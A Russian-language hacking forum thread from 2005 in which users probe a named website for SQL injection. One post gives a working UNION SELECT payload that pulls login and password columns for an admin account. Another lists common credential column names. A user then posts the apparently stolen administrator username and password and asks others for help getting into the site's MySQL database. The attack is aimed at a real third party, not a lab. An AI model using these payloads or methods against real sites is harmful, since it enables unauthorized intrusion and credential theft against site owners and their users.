HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 06.10.2005, 11:05
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
С нами: 11456832

Репутация: 2
По умолчанию

http://nepom.ru/interest/?raz=1%27
http://nepom.ru/users/?login=%27
Не выходит выполнить запрос. Что-то быстро они багу та увидали надеюсь всё мирно будет
 
Ответить с цитированием

  #12  
Старый 06.10.2005, 12:22
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию

Продолжение следует
http://nepom.ru/story/text.php?id=-1'+UNION+SELECT+1,2,3,login,passwd,6,7,8,9,10,11 FROM+users+where+login='ChatAdmin'/*
 
Ответить с цитированием

  #13  
Старый 07.10.2005, 07:38
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
С нами: 11456832

Репутация: 2
По умолчанию

virgoz -- благодарю только вот у меня вопрос как ты догадался что там есть login,passwd ............ Крутая иньекция получилась
 
Ответить с цитированием

  #14  
Старый 07.10.2005, 14:28
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
С нами: 11393666

Репутация: 47
По умолчанию

login, passwd, uname, username, user, pass, password, pas - самые распостраненные имена для столбцов c паролями и логинами.
 
Ответить с цитированием

  #15  
Старый 10.10.2005, 13:18
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
С нами: 11456832

Репутация: 2
По умолчанию

Вот на досуге полазал нашол следующее
Administrator
ytnvtyz
Вообщем не без вашей помощи удалось добыть далее захожу и нахожу бд my sql... Вот только почемута не получается войти пароль может иной или доступ только по IP можете взглянуть может у вас чтонибуть выйдет........
 
Ответить с цитированием

  #16  
Старый 10.10.2005, 14:44
Deniska
Познающий
Регистрация: 27.07.2005
Сообщений: 37
С нами: 10941186

Репутация: 5
По умолчанию

Та же беда
Не пускает.
 
Ответить с цитированием

  #17  
Старый 11.10.2005, 07:15
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
С нами: 11456832

Репутация: 2
По умолчанию

Ну жаль скорее всего идёт проверка по Ip потому и не пускает мне в принципе прав админа хватает...
 
Ответить с цитированием

  #18  
Старый 06.11.2005, 11:09
Thief
Познающий
Регистрация: 03.08.2004
Сообщений: 52
С нами: 11456832

Репутация: 2
По умолчанию

Здраствуйте снова был такой ресурс nepom.ru потом временно его не стало но сейчас он появился снова но пропатчиный но со старой дыркой http://nepom.ru/interest/?raz='
Иньекцию не получается сделать никак, нет таких мозгов как virgoz[B] Помогите...
 
Ответить с цитированием

  #19  
Старый 07.11.2005, 16:22
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
С нами: 10863746

Репутация: 519
По умолчанию

http://nepom.ru/interest/?raz='
Запрос SELECT `id` FROM `int` WHERE `raz`=''' не выполнен

выбор идет только по одному INTEGER полю
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.